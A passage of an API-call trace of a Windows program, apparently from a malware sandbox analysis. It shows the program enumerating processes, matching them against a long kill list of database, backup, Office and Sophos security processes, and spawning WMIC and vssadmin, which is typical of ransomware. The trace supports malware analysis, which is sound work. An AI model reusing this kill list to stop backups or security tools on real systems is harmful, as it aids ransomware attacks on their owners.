1 [0129.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.780] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583140 [0129.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3583140, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0129.780] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0129.780] StrStrIA (lpFirst="rxodge.exe", lpSrch="sql") returned 0x0 [0129.780] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.781] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3583290 [0129.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3583290, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0129.781] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0129.781] StrStrIA (lpFirst="sppsvc.exe", lpSrch="sql") returned 0x0 [0129.781] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0129.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0129.782] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3596a08 [0129.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3596a08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0129.782] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0129.782] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="sql") returned 0x0 [0129.782] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0129.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.783] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35830b0 [0129.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x35830b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0129.784] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0129.784] StrStrIA (lpFirst="TiWorker.exe", lpSrch="sql") returned 0x0 [0129.784] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0129.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIC.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0129.785] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35830c8 [0129.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIC.exe", cchWideChar=-1, lpMultiByteStr=0x35830c8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMIC.exe", lpUsedDefaultChar=0x0) returned 9 [0129.785] lstrcpyA (in: lpString1=0x567fabc, lpString2="WMIC.exe" | out: lpString1="WMIC.exe") returned="WMIC.exe" [0129.785] StrStrIA (lpFirst="WMIC.exe", lpSrch="sql") returned 0x0 [0129.785] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x11dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0129.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vssadmin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.786] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35830e0 [0129.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vssadmin.exe", cchWideChar=-1, lpMultiByteStr=0x35830e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vssadmin.exe", lpUsedDefaultChar=0x0) returned 13 [0129.786] lstrcpyA (in: lpString1=0x567fabc, lpString2="vssadmin.exe" | out: lpString1="vssadmin.exe") returned="vssadmin.exe" [0129.786] StrStrIA (lpFirst="vssadmin.exe", lpSrch="sql") returned 0x0 [0129.786] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x380, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0129.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.787] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35830f8 [0129.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35830f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0129.787] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0129.787] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0129.787] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0129.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.788] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583158 [0129.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0129.788] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0129.788] StrStrIA (lpFirst="conhost.exe", lpSrch="sql") returned 0x0 [0129.788] Process32NextW (in: hSnapshot=0x2fc, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x7e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0129.790] CloseHandle (hObject=0x2fc) returned 1 [0129.790] SetEvent (hEvent=0x210) returned 1 [0129.790] Sleep (dwMilliseconds=0x2710) [0140.527] lstrcpyA (in: lpString1=0x567f090, lpString2="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" | out: lpString1="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v") returned="sql,mysql,veeam,oracle,ocssd,dbsnmp,synctime,agntsvc,isqlplussvc,xfssvccon,mydesktopservice,ocautoupds,encsvc,firefox,tbirdconfig,mydesktopqos,ocomm,dbeng50,sqbcoreservice,excel,infopath,msaccess,mspub,onenote,outlook,powerpnt,steam,thebat,thunderbird,visio,winword,wordpad,EduLink2SIMS,bengine,benetns,beserver,pvlsvr,beremote,VxLockdownServer,postgres,fdhost,WSSADMIN,wsstracing,OWSTIMER,dfssvc.exe,dfsrs.exe,swc_service.exe,sophos,SAVAdminService,SavService.exe,Hyper-v" [0140.528] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x370 [0140.565] Process32FirstW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0140.566] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3596a48 [0140.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3596a48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0140.566] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0140.566] StrStrIA (lpFirst="[System Process]", lpSrch="sql") returned 0x0 [0140.567] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0140.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0140.568] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e3b8 [0140.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e3b8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0140.568] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0140.568] StrStrIA (lpFirst="System", lpSrch="sql") returned 0x0 [0140.568] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0140.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0140.569] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35834d0 [0140.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x35834d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0140.569] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0140.569] StrStrIA (lpFirst="smss.exe", lpSrch="sql") returned 0x0 [0140.569] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.570] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35833c8 [0140.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35833c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0140.570] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0140.570] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0140.570] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0140.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.571] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583488 [0140.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3583488, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0140.689] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0140.690] StrStrIA (lpFirst="wininit.exe", lpSrch="sql") returned 0x0 [0140.690] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.691] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35834a0 [0140.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35834a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0140.691] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0140.691] StrStrIA (lpFirst="csrss.exe", lpSrch="sql") returned 0x0 [0140.691] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0140.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.692] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35833b0 [0140.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x35833b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0140.692] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0140.692] StrStrIA (lpFirst="winlogon.exe", lpSrch="sql") returned 0x0 [0140.692] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0140.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0140.693] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35835d8 [0140.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x35835d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0140.693] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0140.693] StrStrIA (lpFirst="services.exe", lpSrch="sql") returned 0x0 [0140.693] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0140.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.694] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35835a8 [0140.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x35835a8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0140.694] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0140.694] StrStrIA (lpFirst="lsass.exe", lpSrch="sql") returned 0x0 [0140.694] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.695] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35834e8 [0140.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35834e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.696] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.696] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.696] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0140.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0140.698] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3583368 [0140.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3583368, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0140.698] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0140.698] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0140.698] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0140.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0140.699] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x35833f8 [0140.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x35833f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0140.699] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0140.699] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="sql") returned 0x0 [0140.699] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.700] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3583578 [0140.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3583578, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0140.700] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0140.700] StrStrIA (lpFirst="svchost.exe", lpSrch="sql") returned 0x0 [0140.700] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0140.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.701] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e3d8 [0140.701] WideCharToMultiByte (in: 